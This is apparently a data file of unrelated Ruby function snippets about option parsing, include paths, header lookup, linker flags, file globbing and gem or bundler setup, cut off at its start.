'option ' + opt + ' is deprecated: ' + DEPRECATED[opt]\n end\n end\n\n unless invalid.empty? then\n invalid = \"invalid options: #{invalid.join ', '}\"\n\n if ignore_invalid then\n unless quiet then\n $stderr.puts invalid\n $stderr.puts '(invalid options are ignored)'\n end\n else\n unless quiet then\n $stderr.puts opts\n end\n $stderr.puts invalid\n exit 1\n end\n end\n\n @files = argv.dup\n\n self\n end",
"def flags\n input = @flags.clone\n tok = []\n\n # Set the output path\n throw 'Output pathname is required' if @output.nil?\n if Platform.is_windows?\n tok.push \"/OUT:\\\"#{@output}\\\"\"\n tok.push '/DLL' if @output =~ /\\.dll/i\n else\n tok.push '-o', @output\n end\n\n # Enable shared library output\n if @shared_library\n if Platform.is_windows?\n tok.push '/DLL'\n else\n tok.push '-shared'\n tok.push '-fPIC'\n end\n end\n\n # Assume that we want to link with shared libraries\n # built within this project\n unless Platform.is_windows?\n tok.push '-L', '.'\n end\n\n # Override the normal search path for the dynamic linker\n unless @rpath.nil?\n if Platform.is_solaris?\n input.push ['R', @rpath]\n elsif Platform.is_linux?\n input.push ['-rpath', @rpath]\n elsif Platform.is_windows?\n # XXX-FIXME Windows does not support the rpath concept\n else\n throw 'Unsupported OS'\n end\n input.push ['-L', @rpath]\n end\n\n input.each do |f|\n if @gcc_flags == true\n if f.kind_of?(Array)\n if f[0] == '-L'\n tok.push f.join(' ')\n else\n tok.push '-Wl,' + f[0] + ',' + f[1]\n end\n else\n tok.push '-Wl,' + f\n end\n else\n if f.kind_of?(Array)\n tok.push f.flatten.join(' ')\n else\n tok.push f\n end\n end\n end\n\n res = ' ' + tok.join(' ')\n return res\n end",
"def find_header_file(header)\n filename = nil\n header_include_paths.each do |path|\n maybe_filename = \"#{path}/#{header}\"\n if File.exists?(maybe_filename)\n filename = maybe_filename\n break\n end\n end\n filename\nend",
"def header_files\n @header_files ||= find_files( @header_search_paths, @header_file_extension ).uniq\n @header_files\n end",
"def parse_files\n @parse_files ||=\n begin\n files = expand_dirs_to_files(@path)\n files = file_sort(files)\n\n if @options['only'].present?\n files = file_accept(files, @options['only'])\n end\n\n # By default, tmp, vender, spec, test, features are ignored.\n %w[vendor spec test features tmp].each do |dir|\n files = file_ignore(files, File.join(@path, dir)) unless @options[dir]\n end\n\n # Exclude files based on exclude regexes if the option is set.\n @options['exclude'].each do |pattern|\n files = file_ignore(files, pattern)\n end\n\n %w[Capfile Gemfile Gemfile.lock].each do |file|\n files.unshift File.join(@path, file)\n end\n\n files.compact\n end\n end",
"def parse_opts\n\tif ARGV.empty? then puts \"Usage: ch_find.rb [options] <search_term> <replacement>\\n\"; exit end\n\tOptionParser.new do |opts|\n\t\topts.banner = \"\\nOptions:\"\n\t\topts.on(\"-v\", \"--version\", \"Display the version\") {output_version}\n\t\topts.on(\"-h\", \"--help\", \"Display the help\") {output_help opts}\n\t\topts.on(\"-n\", \"--names\", \"Grep file names only, not contents\") {Opts['names'] = true}\n\t\topts.on(\"-f\", \"--file [FILE]\", \"Act only on a specific file\") {|file| Opts['file'] = file}\n\t\topts.on(\"-e\", \"--exclude [EXTENSIONS]\", \"Exclude specific files types\") {|extensions| Opts['exclude'] = extensions.gsub('.','').gsub(',',' ').split(/\\s/)}\n\t\topts.on(\"-i\", \"--include [EXTENSIONS]\", \"Include specific file types only\") {|extensions| Opts['include'] = extensions.gsub('.','').gsub(',',' ').split(/\\s/)}\n\t\topts.on(\"-r\", \"--replace\", \"Replace param1 with param2\") {Opts['replace'] = true}\n\t\topts.on(\"-d\", \"--dry-run\", \"Print replacements but do not write to disk\") {Opts['dry_run'] = true}\n\tend.parse!\nend",
"def initialize(input_file_name, include_path)\n @input_file_name = input_file_name\n @include_path = include_path\n @options = nil\n end",
"def scanCPPFiles file_param\n\n\tif file_param == nil then return end\n\n\tno_ending = file_param.split(\".\")\n\tif File.exist? \"#{no_ending}.cpp\"\n\t\t$cppObjects.push(no_ending[0])\n\n\t\tf = File.open(\"#{no_ending[0]}.cpp\",\"r\").each_line { |line|\n\n\t\t\tline.scan(/^#include \"(.+)\"$/) do |w|\n\t\t\t\t$files_to_do.push(w)\n\t\t\tend\n\t\t}\n\t\t$files_to_do.flatten!\n\t\t$cppObjects.each do |word|\n\t\t\t$files_to_do.reject! {|repeat| repeat.split(\".\")[0] == word}\n\t\tend\n\tend\n\tif $files_to_do != nil then\n\t\t$files_to_do.uniq!\n\t\tscanCPPFiles $files_to_do.pop\n\tend\n\nend",
"def getHeaderDependencesAbsOrRel(builder, srcfile, print)\n\t\tif print\n\t\t\tputs \"running gcc dependence printer on #{srcfile}\"\n\t\tend\n\t\t\n\t\t#don't need to src2build() the output dir because the builder's dir is already under the build tree\n\t\toutfilename = @tmpdir.join('includes.list') #write to file in case stdout gets muddied by preprocessor errors\n\t\t\n\t\t#gcc -M flag lists included headers; with -M, -MG means assume missing files are generated, and -MF specifies outfilename for header list\n\t\tcmd = \"#{compileCmd(srcfile)} #{@INCDIRS.map {|dirpath| \"-I#{dirpath}\"}.join(' ')} -MF #{outfilename} -M -MG #{srcfile.to_s}\"\n\t\t\n#\t\tputs cmd\n\t\t`#{cmd}`\n\t\tif $?.to_i != 0\n\t\t\traise \"gcc dependence printer found errors; killing rake\"\n\t\telse\n\t\t\tfid = File.open(outfilename)\n\t\t\toutput = fid.map {|line| line.to_s}.join('')\n\t\t\tfid.close()\n\t\t\t`#{$RM} #{outfilename}`\n\t\t\tfilenames = output.gsub(/\\\\\\n/, ' ').gsub(/:\\s+/, ' ').gsub(/([^\\\\])\\s+/, \"\\\\1 \").split(/\\s+/) #regexes specific to gcc-like output\n\t\t\tfilenames.shift; filenames.shift #remove object filename and source filename; rest are headers\n\t\t\treturn filenames\n\t\tend\n\tend",
"def get_include_data(line)\n return IO.read(line.include_file_path) if line.include_file_options.nil?\n\n case line.include_file_options[0]\n when ':lines'\n # Get options\n include_file_lines = line.include_file_options[1].gsub('\"', '').split('-')\n include_file_lines[0] = include_file_lines[0].empty? ? 1 : include_file_lines[0].to_i\n include_file_lines[1] = include_file_lines[1].to_i if !include_file_lines[1].nil?\n\n # Extract request lines. Note that the second index is excluded, according to the doc\n line_index = 1\n include_data = []\n File.open(line.include_file_path, \"r\") do |fd|\n while line_data = fd.gets\n if (line_index >= include_file_lines[0] and (include_file_lines[1].nil? or line_index < include_file_lines[1]))\n include_data << line_data.chomp\n end\n line_index += 1\n end\n end\n\n when 'src', 'example', 'quote'\n # Prepare tags\n begin_tag = '#+BEGIN_%s' % [line.include_file_options[0].upcase]\n if line.include_file_options[0] == 'src' and !line.include_file_options[1].nil?\n begin_tag += ' ' + line.include_file_options[1]\n end\n end_tag = '#+END_%s' % [line.include_file_options[0].upcase]\n\n # Get lines. Will be transformed into an array at processing\n include_data = \"%s\\n%s\\n%s\" % [begin_tag, IO.read(line.include_file_path), end_tag]\n\n else\n include_data = []\n end\n # @todo: support \":minlevel\"\n\n include_data\n end",
"def header_magic(ind, outd)\n dirs = []\n hdrs = []\n\n find_files(ind, /.*\\.h[hxp]*$/) do |p|\n outdir = File.dirname p.sub(ind, outd)\n outfile = File.join(outd, File.basename(p))\n\n directory outdir\n file outfile => p do\n cp_r p, outdir\n end\n dirs.push outdir\n hdrs.push outfile\n CLEAN.include outfile, outdir\n end\n\n dirs+hdrs\nend",
"def includes(options)\n @includes = options\n end",
"def makeIncludesString (dirnames) \n\t\tstr = \"\"\n\t\tdirnames.each do |dirname|\n\t\t\tstr += \" -I \" + dirname\n\t\tend\n\t\treturn str\n\tend",
"def parseopts\n\n opts = OptionParser.new\n opts.on( '-v', '--verbose', \"Run verbosely\" ) { @verbose = true }\n opts.on( '-h', '--help', \"Emit help information\") { @help = true }\n opts.on( '--version', \"Emit version and exit\") { @version = true }\n opts.on( '-n', '--name NAME', \"Array name\" ) { |n| @arrayname = n }\n opts.on( '-t', '--type TYPE', \"Array type\" ) { |t| @arraytype = t }\n opts.on( '-o', '--output FILE', 'Output file name' ) { |f| @outfile = f\n $stdout.reopen(f, \"w\")}\n opts.on( '-p', '--[no-]preamble', \"No file header\" ) { |n| @preamble = n }\n\n opts.banner =<<-end.gsub(/^ {6}/, '')\n Translates the contents of any file to a C array.\n\n Usage: #{@appname} [options] [filename]\n\n Options:\n end\n\n\n opts.separator <<-notes.gsub(/^ {6}/, '')\n\n Examples:\n #{@appname} -o output.cpp foo.bin\n #{@appname} -o header.h foo.bin\n #{@appname} -v <foo.bin >output.cpp\n #{@appname} --no-preamble -o output.cpp <foo.bin\n #{@appname} --type \\\"uint8_t\\\" <foo.bin >output.cpp\n\n notes\n\n begin\n opts.parse!\n\n rescue Exception => e\n puts e, opts\n exit\n end\n\n if @version\n puts @verstring\n exit 0\n\n elsif @help\n puts opts\n exit 0\n end\n\n\n # if no arrayname specified, use\n # infile name. If infile is\n # stdin, use default.\n\n if @arrayname == \"\"\n fname = ARGF.filename\n\n if fname == \"-\" # stdin\n fname = \"binary_data\"\n end\n\n @arrayname = fname.chomp(File.extname(fname))\n end\n\n\n if @verbose\n warn <<-end.gsub(/^ {8}/, '')\n appname = #{File.basename $0}\n verstring = #{@appname} #{BIN2CVER}\n time = #{@time}\n verbose = #{@verbose}\n help = #{@help}\n version = #{@version}\n arrayname = #{@arrayname}\n arraytype = #{@arraytype}\n infile = #{ARGF.filename}\n outfile = #{@outfile}\n preamble = #{@preamble}\n\n end\n end\n end",
"def include(*files)\n fail \"AchiveTask.include() called with nil values\" if files.include? nil\n @paths[''].include *files if files.compact.size > 0\n self\n end",
"def include(*files)\n @include += files.flatten\n self\n end",
"def add_includes out, includes\n return if includes.empty?\n out << RDoc::Markup::Rule.new(1)\n out << RDoc::Markup::Heading.new(1, \"Includes:\")\n includes.each do |modules, store|\n if modules.length == 1 then\n include = modules.first\n name = include.name\n path = store.friendly_path\n out << RDoc::Markup::Paragraph.new(\"#{name} (from #{path})\")\n if include.comment then\n out << RDoc::Markup::BlankLine.new\n out << include.comment\n end\n else\n out << RDoc::Markup::Paragraph.new(\"(from #{store.friendly_path})\")\n wout, with = modules.partition { |incl| incl.comment.empty? }\n out << RDoc::Markup::BlankLine.new unless with.empty?\n with.each do |incl|\n out << RDoc::Markup::Paragraph.new(incl.name)\n out << RDoc::Markup::BlankLine.new\n out << incl.comment\n end\n unless wout.empty? then\n verb = RDoc::Markup::Verbatim.new\n wout.each do |incl|\n verb.push incl.name, \"\\n\"\n end\n out << verb\n end\n end\n end\n end",
"def ready\n includes = @options.includes\n unless Array === includes\n error \"Invalid value for @options.includes: #{includes.inspect}\"\n end\n includes.each do |dir|\n $:.unshift dir\n end\n end",
"def search_filenames\n # * => all files\n # r => search from its subdirectories\n # i => ignore cases\n # l => list file name\n # c => show word occurence count\n # w => words\n\n args = set_args\n # grep -ril '#keyword1' --include=\\*.rb *\n `grep -ril '#{args}' #{search_extension} *`\n end",
"def load_file_path!\n @files = FilepathScanner.call(\n include_paths,\n exclude_path_regexps,\n recursive_scan: recursive_include\n )\n end",
"def option_search_all(options)\n if(directory = options[:in_dir])\n search_in(:directory => directory, :for_files => search_all_files)\n else\n search_all_files\n end\n end",
"def search(options)\n result = case options\n when MatchData\n options.to_s\n when Hash\n if options.include?(:all)\n option_search_all(options).join(' ')\n else\n search_file_with_pattern(:pattern => options[:test_for][1], :in_dir => options[:in_dir])\n end\n end\n end",
"def parse_args(*args)\n if args.size == 0\n args = [File.expand_path('.')]\n end\n\n @files = []\n args.each do |file|\n next unless File.exists?(file)\n file = File.expand_path(file)\n\n # If target is a dir, we add all music files in this dir\n if File.directory?(file)\n @files += Dir.glob(File.join(file, '**', '*.{mp3,ogg}')).map{|i| File.expand_path(i)}.sort\n else\n @files << file\n end\n end\n end",
"def in_source_dir(*paths); end",
"def all(options = {:activated => true, :detailed => true, :files => ['^app/(.*)\\.rb', '^lib/(.*)\\.rb']})\n @options.each do |option|\n option ||= {}\n option << options\n end\n end",
"def add(glob, options)\n definition << options.merge(:glob => glob)\n end",
"def includes(*paths)\n @includes.concat(paths) unless paths.empty?\n @includes\n end",
"def do_includes\n @body.scan(/rb_include_module\\s*\\(\\s*(\\w+?),\\s*(\\w+?)\\s*\\)/) do |c,m|\n if cls = @classes[c]\n m = @known_classes[m] || m\n cls.add_include(Include.new(m, \"\"))\n end\n end\n end",
"def initialize file, include_path\n @file = file\n @include_path = include_path\n end",
"def have_header(header, *directories)\n erb = ERB.new(read_template('have_header.erb'))\n code = erb.result(binding)\n\n if directories.empty?\n options = nil\n else\n options = ''\n directories.each{ |dir| options += \"-I#{dir} \" }\n options.rstrip!\n end\n\n try_to_compile(code, options)\n end",
"def option_list\n result = @options.dup\n result << \"-o\" << @rdoc_dir\n result << \"--main\" << main if main\n result << \"--markup\" << markup if markup\n result << \"--title\" << title if title\n result << \"-T\" << template if template\n result << '-f' << generator if generator\n result\n end",
"def parse(header_file, to_file)\n includes = @includes.flatten.uniq.map {|i| \"-I#{i.chomp}\"}.join(\" \").chomp\n flags = @flags.flatten.join(\" \").chomp\n flags += \" -Wno-unused-command-line-argument --castxml-cc-gnu #{find_clang} --castxml-gccxml\"\n\n exe = find_exe.strip.chomp\n cmd = \"#{exe} #{includes} #{flags} -o #{to_file} #{header_file}\"\n raise \"Error executing castxml command line: #{cmd}\" unless system(cmd)\n end",
"def setup_options(args)\n\toptions = {:output_dir => \"./merged_sam\",\n\t\t\t :sample_name => \"\"}\n\n\topt_parser = OptionParser.new do |opts|\n\t\topts.banner = \"Usage: multiple_sam_files.rb [options] sam_file*\"\n\t\topts.separator \"\"\n\t\n\t\topts.on(\"-o\", \"--output_dir [DIR]\", :REQUIRED, String, \"Root directory for the results (default: ./merged_sam)\" ) do |o|\n\t\t\toptions[:output_dir] = o\n\t\tend\n\t\n\t\topts.on(\"-n\", \"--sample_name\", :REQUIRED, String, \"Sample name of the merged SAM file\" ) do |n|\n\t\t\toptions[:sample_name] = n\n\t\tend\n\t\n\t\topts.on(\"-d\", \"--debug\", \"Run in debug mode\") do |d|\n\t\t\toptions[:log_level] = \"debug\"\n\t\tend\n\t\n\t\topts.on_tail(\"-h\", \"--help\", \"Show this message\") do\n\t\t\tputs opts\n\t\t\texit\n\t\tend\n\tend\n\t\n\targs = [\"-s\"] if args.length == 0\n\topt_parser.parse!(args)\n\traise \"Please specify sam_files\" if args.length == 0\n\toptions\nend",
"def add_includes out, includes\n add_extension_modules out, 'Includes', includes\n end",
"def final_options(library, paths); end",
"def initialize(lines, parser_options={ })\n if lines.is_a? Array then\n @lines = lines\n elsif lines.is_a? String then\n @lines = lines.split(\"\\n\")\n else\n raise \"Unsupported type for +lines+: #{lines.class}\"\n end\n\n @custom_keywords = []\n @headlines = Array.new\n @current_headline = nil\n @header_lines = []\n @in_buffer_settings = { }\n @options = { }\n @link_abbrevs = { }\n @parser_options = parser_options\n\n #\n # Include file feature disabled by default since \n # it would be dangerous in some environments\n #\n # http://orgmode.org/manual/Include-files.html\n #\n # It will be activated by one of the following:\n #\n # - setting an ORG_RUBY_ENABLE_INCLUDE_FILES env variable to 'true'\n # - setting an ORG_RUBY_INCLUDE_ROOT env variable with the root path\n # - explicitly enabling it by passing it as an option:\n # e.g. Orgmode::Parser.new(org_text, { :allow_include_files => true })\n #\n # IMPORTANT: To avoid the feature altogether, it can be _explicitly disabled_ as follows:\n # e.g. Orgmode::Parser.new(org_text, { :allow_include_files => false })\n #\n if @parser_options[:allow_include_files].nil?\n if ENV['ORG_RUBY_ENABLE_INCLUDE_FILES'] == 'true' \\\n or not ENV['ORG_RUBY_INCLUDE_ROOT'].nil?\n @parser_options[:allow_include_files] = true\n end\n end\n\n @parser_options[:offset] ||= 0\n\n parse_lines @lines\n end",
"def included_files; end",
"def get_header_fns\n fns = {}\n basename = File.basename(@parts[:fn], @parts[:ext]) + Cpp::get_header_ext(@parts[:ext])\n ['src', 'inc'].each do |type|\n fns[type] = File.join(@parts[:base_dir],\n @parts[:module],\n type,\n @parts[:namespaces],\n basename)\n end\n fns\n end",
"def findopts\n [{ option: :atime,\n flag: '-atime',\n value: 'n[smhdw]',\n validate: validate_time,\n description: 'Access time.'\n },\n { option: :depth,\n flag: '-depth',\n value: 'n',\n validate: validate_number,\n description: 'Depth relative to the starting point.'\n },\n { option: :iname,\n flag: '-iname',\n value: '[pattern]',\n description: 'Path matches pattern (case insensitive).'\n },\n { option: :ipath,\n flag: '-ipath',\n value: '[pattern]',\n description: 'Path matches pattern (case insensitive).'\n },\n { option: :maxdepth,\n flag: '-maxdepth',\n value: 'n',\n validate: validate_nonnegative,\n description: 'Descend at most n directory levels.'\n },\n { option: :mindepth,\n flag: '-mindepth',\n value: 'n',\n validate: validate_nonnegative,\n description: 'Descend at least n directory levels.'\n },\n { option: :minsize,\n flag: '-minsize',\n value: 'n',\n validate: validate_unsigned_numeric,\n description: 'Prunes find expression to objects of a minimum size.'\n },\n { option: :mindsize,\n flag: '-mindirsize',\n value: 'n',\n validate: validate_unsigned_numeric,\n description: 'Prunes find expression to directories of a minimum size.'\n },\n { option: :mtime,\n flag: '-mtime',\n value: 'n[smhdw]',\n validate: validate_time,\n description: 'Modification time.'\n },\n { option: :name,\n flag: '-name',\n value: '[pattern]',\n description: 'Name (last component of the path) matches pattern.'\n },\n { option: :path,\n flag: '-path',\n value: '[pattern]',\n description: 'Path matches pattern.'\n },\n { option: :print,\n flag: '-print',\n description: 'Print the pathname.'\n },\n { option: :ls,\n flag: '-ls',\n description: 'Print ls-style information.'\n },\n { option: :size,\n flag: '-size',\n value: 'n[ckMGTP]',\n validate: validate_numeric,\n description: 'File size.'\n }\n ]\n end",
"def list_files(options = {}) \n options = DEFAULTS.merge(options)\n\n path = options[:path]\n all = options[:all]\n extension = options[:extension]\n\n extension = \".#{extension}\" unless extension == '' or extension.start_with?('.') \n file_wildcard = \"*#{extension}\"\n\n path = \"#{path}/\" unless path == '' or path.end_with?('/')\n path = path+'**/' if all \n\n Dir.glob(\"#{path}#{file_wildcard}\")\n end",
"def packages_providing_header(header)\n packages_providing(\"*/usr/include/#{header}\")\nend",
"def parse_options\n @opts = Slop.parse do |o| \n o.string '-f1', '--file1', 'First source file'\n o.string '-f2', '--file2', 'Second source file'\n o.on '-v', '--version' do\n puts Slop::VERSION\n end\n end\n rescue Exception => e\n raise\n end",
"def parse_files(files, opts = {})\n opts = { :extension => nil, :directory => nil }.merge opts\n files = [files] unless files.is_a?(Array)\n search_text = files.join(\" \")\n parsed_files = []\n while !files.empty?\n file = files.shift\n unless opts[:directory].nil?\n file = opts[:directory] + \"/\" + file\n end\n unless opts[:extension].nil?\n file = file.sub(/\\.[^\\\\\\/]*$/, \"\") + \".\" + opts[:extension].to_s.tr(\".\", \"\")\n end\n parsed_files += Dir.glob(File.expand_path(file))\n end\n puts I18n.t(:no_match) % search_text if parsed_files.empty?\n parsed_files.uniq\n end",
"def search_in(options)\n files = options[:for_files]\n directory = options[:directory]\n if directory\n dir_files = files_in_directory(directory)\n files.select { |file| dir_files.include?(file) }\n else\n files\n end\n end",
"def find_options options={}\r\n con = conditions\r\n par = parameters\r\n inc = includes\r\n cond_ary = nil\r\n if conditions\r\n cond_ary=[con]\r\n cond_ary += par if par\r\n end\r\n options[:conditions] = cond_ary if cond_ary\r\n options[:include] = includes if includes\r\n options \r\n end",
"def included\n return [] if directory.empty? || directory == '*'\n @included ||= process_globs(@raw_data['include'])\n end",
"def parse_csproj(filename, options={})\n lines = []\n\n if File.exists?(filename)\n File.open(filename, \"r\") do |file|\n doc = Nokogiri::XML(file)\n\n unless options[:skip_source]\n # source files\n doc.css('Compile').each do |element|\n name = element.attr(\"Include\")\n name = name.gsub(/\\\\/, \"/\") if posix?\n say_status \"SOURCE\", name, :green\n lines << \"'#{name}'\"\n end\n end\n\n # explicitly hinted dll paths\n doc.css('HintPath').each do |element|\n name = element.children.text.chomp\n say_status \"DLL\", name, :green\n lines << \"-r:'#{name}'\"\n end\n\n # compiler defines\n doc.css('DefineConstants').each do |element|\n name = element.children.text.chomp\n name.split(/;/).each do |define|\n say_status \"DEFINE\", define, :green\n lines << \"-define:'#{define}'\"\n end\n end\n end\n end\n\n lines\n end",
"def parse_main_args(main_args)\n\n $logger.debug \"Parsing main_args #{main_args}\"\n\n # verbose already handled\n main_args.delete('--verbose')\n\n # Operate on the include option to add to $LOAD_PATH\n remove_indices = []\n new_path = []\n main_args.each_index do |i|\n\n if main_args[i] == '-I' || main_args[i] == '--include'\n # remove from further processing\n remove_indices << i\n remove_indices << i+1\n\n dir = main_args[i + 1]\n\n if dir.nil?\n $logger.error \"#{main_args[i]} requires second argument DIR\"\n return false\n elsif !File.exists?(dir) || !File.directory?(dir)\n # DLM: Ruby doesn't warn for this\n #$logger.warn \"'#{dir}' passed to #{main_args[i]} is not a directory\"\n end\n new_path << dir\n elsif main_args[i] == '--no-ssl'\n $logger.warn \"'--no-ssl' flag is deprecated\"\n end\n end\n\n remove_indices.reverse_each {|i| main_args.delete_at(i)}\n\n if !new_path.empty?\n\n new_path = new_path.concat($LOAD_PATH)\n\n $logger.info \"Setting $LOAD_PATH to #{new_path}\"\n $LOAD_PATH.clear\n\n new_path.each {|p| $LOAD_PATH << p}\n end\n\n # Operate on the gem_path option to set GEM_PATH\n remove_indices = []\n new_path = []\n main_args.each_index do |i|\n\n if main_args[i] == '--gem_path'\n\n # remove from further processing\n remove_indices << i\n remove_indices << i+1\n\n dir = main_args[i + 1]\n\n if dir.nil?\n $logger.error \"#{main_args[i]} requires second argument DIR\"\n return false\n elsif !File.exists?(dir) || !File.directory?(dir)\n # DLM: Ruby doesn't warn for this\n #$logger.warn \"'#{dir}' passed to #{main_args[i]} is not a directory\"\n end\n new_path << dir\n end\n end\n remove_indices.reverse_each {|i| main_args.delete_at(i)}\n\n if !new_path.empty?\n if ENV['GEM_PATH']\n new_path << ENV['GEM_PATH'].to_s\n end\n\n new_path = new_path.join(File::PATH_SEPARATOR)\n\n $logger.info \"Setting GEM_PATH to #{new_path}\"\n ENV['GEM_PATH'] = new_path\n end\n\n # Operate on the gem_home option to set GEM_HOME\n if main_args.include? '--gem_home'\n option_index = main_args.index '--gem_home'\n path_index = option_index + 1\n new_home = main_args[path_index]\n main_args.slice! path_index\n main_args.slice! main_args.index '--gem_home'\n\n $logger.info \"Setting GEM_HOME to #{new_home}\"\n ENV['GEM_HOME'] = new_home\n end\n\n # Operate on the bundle option to set BUNDLE_GEMFILE\n use_bundler = false\n if main_args.include? '--bundle'\n option_index = main_args.index '--bundle'\n path_index = option_index + 1\n gemfile = main_args[path_index]\n main_args.slice! path_index\n main_args.slice! main_args.index '--bundle'\n\n $logger.info \"Setting BUNDLE_GEMFILE to #{gemfile}\"\n ENV['BUNDLE_GEMFILE'] = gemfile\n use_bundler = true\n\n elsif ENV['BUNDLE_GEMFILE']\n # no argument but env var is set\n $logger.info \"ENV['BUNDLE_GEMFILE'] set to '#{ENV['BUNDLE_GEMFILE']}'\"\n use_bundler = true\n\n end\n\n if main_args.include? '--bundle_path'\n option_index = main_args.index '--bundle_path'\n path_index = option_index + 1\n bundle_path = main_args[path_index]\n main_args.slice! path_index\n main_args.slice! main_args.index '--bundle_path'\n\n $logger.info \"Setting BUNDLE_PATH to #{bundle_path}\"\n ENV['BUNDLE_PATH'] = bundle_path\n\n elsif ENV['BUNDLE_PATH']\n # no argument but env var is set\n $logger.info \"ENV['BUNDLE_PATH'] set to '#{ENV['BUNDLE_PATH']}'\"\n\n elsif use_bundler\n # bundle was requested but bundle_path was not provided\n $logger.warn \"Bundle activated but ENV['BUNDLE_PATH'] is not set\"\n\n $logger.info \"Setting BUNDLE_PATH to ':/ruby/2.7.0/'\"\n ENV['BUNDLE_PATH'] = ':/ruby/2.7.0/'\n\n end\n\n if main_args.include? '--bundle_without'\n option_index = main_args.index '--bundle_without'\n path_index = option_index + 1\n bundle_without = main_args[path_index]\n main_args.slice! path_index\n main_args.slice! main_args.index '--bundle_without'\n\n $logger.info \"Setting BUNDLE_WITHOUT to #{bundle_without}\"\n ENV['BUNDLE_WITHOUT'] = bundle_without\n\n elsif ENV['BUNDLE_WITHOUT']\n # no argument but env var is set\n $logger.info \"ENV['BUNDLE_WITHOUT'] set to '#{ENV['BUNDLE_WITHOUT']}'\"\n\n elsif use_bundler\n # bundle was requested but bundle_path was not provided\n $logger.warn \"Bundle activated but ENV['BUNDLE_WITHOUT'] is not set\"\n\n # match configuration in build_openstudio_gems\n $logger.info \"Setting BUNDLE_WITHOUT to 'test'\"\n ENV['BUNDLE_WITHOUT'] = 'test'\n\n # ignore any local config on disk\n #DLM: this would be correct if the bundle was created here\n #it would not be correct if the bundle was transfered from another computer\n #ENV['BUNDLE_IGNORE_CONFIG'] = 'true'\n Gem.paths.path << ':/ruby/2.2.0/bundler/gems/'\n\n end\n\n Gem.paths.path << ':/ruby/2.7.0/gems/'\n Gem.paths.path << ':/ruby/2.7.0/bundler/gems/'\n\n # find all the embedded gems\n original_embedded_gems = {}\n\n # Add the gem spec paths. This filepath name gets appended with 'specification' \n # This will trigger Gem to reload all gems in these paths. \n Gem::Specification.dirs=( [\":/ruby/2.7.0\", \":/ruby/2.7.0/gems\", \":/ruby/2.7.0/bundler/gems\" ] ) \n \n # activate or remove bundler\n Gem::Specification.each do |spec|\n if spec.gem_dir.chars.first == ':'\n if spec.name == 'bundler'\n if use_bundler\n spec.activate\n else\n # DLM: don't remove, used by Resolver\n #Gem::Specification.remove_spec(spec)\n end\n end\n end\n end\n\n if use_bundler\n\n current_dir = Dir.pwd\n\n original_arch = nil\n if RbConfig::CONFIG['arch'] =~ /x64-mswin64/\n # assume that system ruby of 'x64-mingw32' architecture was used to create bundle\n original_arch = RbConfig::CONFIG['arch']\n $logger.info \"Temporarily replacing arch '#{original_arch}' with 'x64-mingw32' for Bundle\"\n RbConfig::CONFIG['arch'] = 'x64-mingw32'\n end\n\n\n\n # require bundler\n # have to do some forward declaration and pre-require to get around autoload cycles\n require 'bundler/errors'\n #require 'bundler/environment_preserver'\n require 'bundler/plugin'\n #require 'bundler/rubygems_ext'\n require 'bundler/rubygems_integration'\n require 'bundler/version'\n require 'bundler/ruby_version'\n #require 'bundler/constants'\n #require 'bundler/current_ruby'\n require 'bundler/gem_helpers'\n #require 'bundler/plugin'\n require 'bundler/source'\n require 'bundler/definition'\n require 'bundler/dsl'\n require 'bundler/uri_credentials_filter'\n require 'bundler'\n\n begin\n # activate bundled gems\n # bundler will look in:\n # 1) ENV[\"BUNDLE_GEMFILE\"]\n # 2) find_file(\"Gemfile\", \"gems.rb\")\n #require 'bundler/setup'\n\n groups = Bundler.definition.groups\n keep_groups = []\n without_groups = ENV['BUNDLE_WITHOUT']\n $logger.info \"without_groups = #{without_groups}\"\n groups.each do |g|\n $logger.info \"g = #{g}\"\n if without_groups.include?(g.to_s)\n $logger.info \"Bundling without group '#{g}'\"\n else\n keep_groups << g\n end\n end\n\n $logger.info \"Bundling with groups [#{keep_groups.join(',')}]\"\n\n remaining_specs = []\n Bundler.definition.specs_for(keep_groups).each {|s| remaining_specs << s.name}\n\n $logger.info \"Specs to be included [#{remaining_specs.join(',')}]\"\n\n Bundler.setup(*keep_groups)\n #Bundler.require(*keep_groups)\n\n #rescue Bundler::BundlerError => e\n\n #$logger.info e.backtrace.join(\"\\n\")\n #$logger.error \"Bundler #{e.class}: Use `bundle install` to install missing gems\"\n #exit e.status_code\n\n ensure\n\n if original_arch\n $logger.info \"Restoring arch '#{original_arch}'\"\n RbConfig::CONFIG['arch'] = original_arch\n end\n\n Dir.chdir(current_dir)\n end\n\n else\n # not using_bundler\n\n current_dir = Dir.pwd\n\n begin\n # DLM: test code, useful for testing from command line using system ruby\n #Gem::Specification.each do |spec|\n # if /openstudio/.match(spec.name)\n # original_embedded_gems[spec.name] = spec\n # end\n #end\n\n # get a list of all the embedded gems\n dependencies = []\n original_embedded_gems.each_value do |spec|\n $logger.debug \"Adding dependency on #{spec.name} '~> #{spec.version}'\"\n dependencies << Gem::Dependency.new(spec.name, \"~> #{spec.version}\")\n end\n #dependencies.each {|d| $logger.debug \"Added dependency #{d}\"}\n\n # resolve dependencies\n activation_errors = false\n original_load_path = $:.clone\n resolver = Gem::Resolver.for_current_gems(dependencies)\n activation_requests = resolver.resolve\n $logger.debug \"Processing #{activation_requests.size} activation requests\"\n activation_requests.each do |request|\n do_activate = true\n spec = request.spec\n\n # check if this is one of our embedded gems\n if original_embedded_gems[spec.name]\n\n # check if gem can be loaded from RUBYLIB, this supports developer use case\n original_load_path.each do |lp|\n if File.exists?(File.join(lp, spec.name)) || File.exists?(File.join(lp, spec.name + '.rb')) || File.exists?(File.join(lp, spec.name + '.so'))\n $logger.debug \"Found #{spec.name} in '#{lp}', overrides gem #{spec.spec_file}\"\n Gem::Specification.remove_spec(spec)\n do_activate = false\n break\n end\n end\n end\n\n if do_activate\n $logger.debug \"Activating gem #{spec.spec_file}\"\n begin\n spec.activate\n rescue Gem::LoadError\n $logger.error \"Error activating gem #{spec.spec_file}\"\n activation_errors = true\n end\n end\n\n end\n\n if activation_errors\n return false\n end\n\n ensure\n Dir.chdir(current_dir)\n end\n\n end # use_bundler\n\n # Handle -e commands\n remove_indices = []\n $eval_cmds = []\n main_args.each_index do |i|\n\n if main_args[i] == '-e' || main_args[i] == '--execute'\n # remove from further processing\n remove_indices << i\n remove_indices << i+1\n\n cmd = main_args[i + 1]\n\n if cmd.nil?\n $logger.error \"#{main_args[i]} requires second argument CMD\"\n return false\n end\n\n $eval_cmds << cmd\n end\n end\n remove_indices.reverse_each {|i| main_args.delete_at(i)}\n\n if !main_args.empty?\n $logger.error \"Unknown arguments #{main_args} found\"\n return false\n end\n\n return true\nend",
